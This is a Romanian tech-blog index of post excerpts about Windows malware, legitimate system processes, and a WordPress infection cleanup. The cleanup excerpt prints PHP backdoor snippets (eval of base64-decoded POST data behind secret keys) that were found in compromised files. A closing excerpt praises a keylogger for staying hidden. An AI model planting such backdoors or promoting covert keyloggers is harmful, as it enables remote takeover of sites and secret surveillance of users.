HLDRRR.EXE – Remove Spyware-Virus (wintems.exe, srosa.sys)
HLDRRR.EXE este cunoscut de majoritatea anti-virusilor ca fiind Spyware sau Trojan-Downloader.Win32.Bagle.sn, insa a scapat mult timp si inca mai scapa de anti-virusi foarte cunoscuti, precum Norton si Avira. Zilele trecute am avut o experienta superba cu acest executabil – virus. Daca il intalniti pe PC-urile dvs. trebuie sa fiti siguri ca aveti calculatorul virusat si [...]
CCC.exe (ATI Catalyst Control Center)
ATI Catalyst Control Center (CCC.exe) este un program cu ajutorul caruia puteti personaliza diferite moduri de afisare ale Video Card-ului ATI din dotare (cum ar fi crearea unor shortcut-uri catre diferite tipuri de setari sau a mai multor profile, fiecare in parte corespunzator unor diferite cerinte, de ex. setarile pentru un anumit joc etc). Daca [...]
Lsass.exe vs Sasser.exe (Local Security Authority Subsystem Service vs Worm)
Lsass.exe sau Local Security Authority Subsystem Service este un proces de sistem integrat de Microsoft in Windows OS, responsabil pentru verificarea autenticitati informatiilor de logare ale userilor ori de cate ori acestia vor sa acceseze sistemul. Lsass.exe previne accesarea informatiilor cu caracter personal de catre alti useri inregistrati de sistem (sau nu), acest proces fiind [...]
dllhost.exe (Microsoft DCOM DLL Host Process)
Daca la o verificare de rutina (recomandate pentru “sanatatea” sistemului dvs ;)) dati peste procesul dllhost.exe ruland nestingheritin sistem nu va impacientati (foarte tare). Acest proces apartine Microsoft si este integrat de catre acesta in toate sistemele de operare Windows (OS-initialized file – adica este proces executat de Windows sa ruleze la fiecare bootare). Dllhost.exe [...]
Winlogon.exe (Microsoft Windows Logon Process vs Trojan/Virus)
Winlogon.exe este un proces de sistem integrat de Microsoft in Windows OS si este necesar pentru autentificarea (logare/delogare) userilor unui sistem sau pentru verificarea activarii acestuia (a sistemului). De asemenea, winlogon este responsabil si de protejarea sistemului prin delimitarea exacta a permisiunilor userilor inregistrati (de exemplu, userul administrator are full control iar userii obisnuiti de [...]
Trojan-Downloader.Win32.Agent.yul – Google Toolbar pentru IE 8 Beta 2
Mi-am instalat de curand Internet Explorer 8 Beta 2 (IE 8). De cateva luni bune, folosesc Flock default browser, dar na…produs nou…trebuie testat si IE 8. :-) IE 8 arata destul de promitator, dar mai are de corectat cateva probleme legate de afisarea contentului si al imaginilor pe site-uri. Se intampla pe unele bloguri sa [...]
zilnice.ro, trojan @ malware ?!
Am gasit acum cateva minute un backlink, de la blogul zilnice.ro (nu accesati adresa) : Blogul este virusat, sau cel putin asa cred – Zilnice http://zilnice.ro/zilnice/blogul-este-virusat-sau… | IP [...] ce am dat de postul acesta la StealthSettings, am inceput sa ma gandesc cat de periculosi sunt acesti virusi, si cat de bine [...] Sper sa [...]
WordPress Exploit – Curatare fisiere virusate, SQL si securizare server.
Inainte sa cititi acest post, trebuie sa vedeti postul de aici, ca sa intelegeti ceva. :) Am gasit in mai multe fisiere ale blogurilor de pe stealthsettings.com, coduri asemanatoare cu cele de mai jos, aparute ca urmare a virusarii cu exploitul de WordPress.: <?php if($_GET['573abcb060974771']==”8e96d1b4b674e1d2″){ eval(base64_decode($_POST['file'])); exit; } ?> si <?php if($_COOKIE['44e827f9fbeca184']==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST['file'])); exit; } [...]
Perfect Keylogger / spy software
Perfect Keylogger (bpk.exe) este unul din putinele programe care are cam toate optiunile pentru a satisface cerintele unui utilizator de spy software. Am folosit KGB Keylogger , Family Keylogger si Wiretap Professional dar nici unul nu monitorizeaza si sta ascuns mai bine in procesele Windows-ului, decat BPK-ul ( Perfect Keylogger ) . Un avantaj este [...]
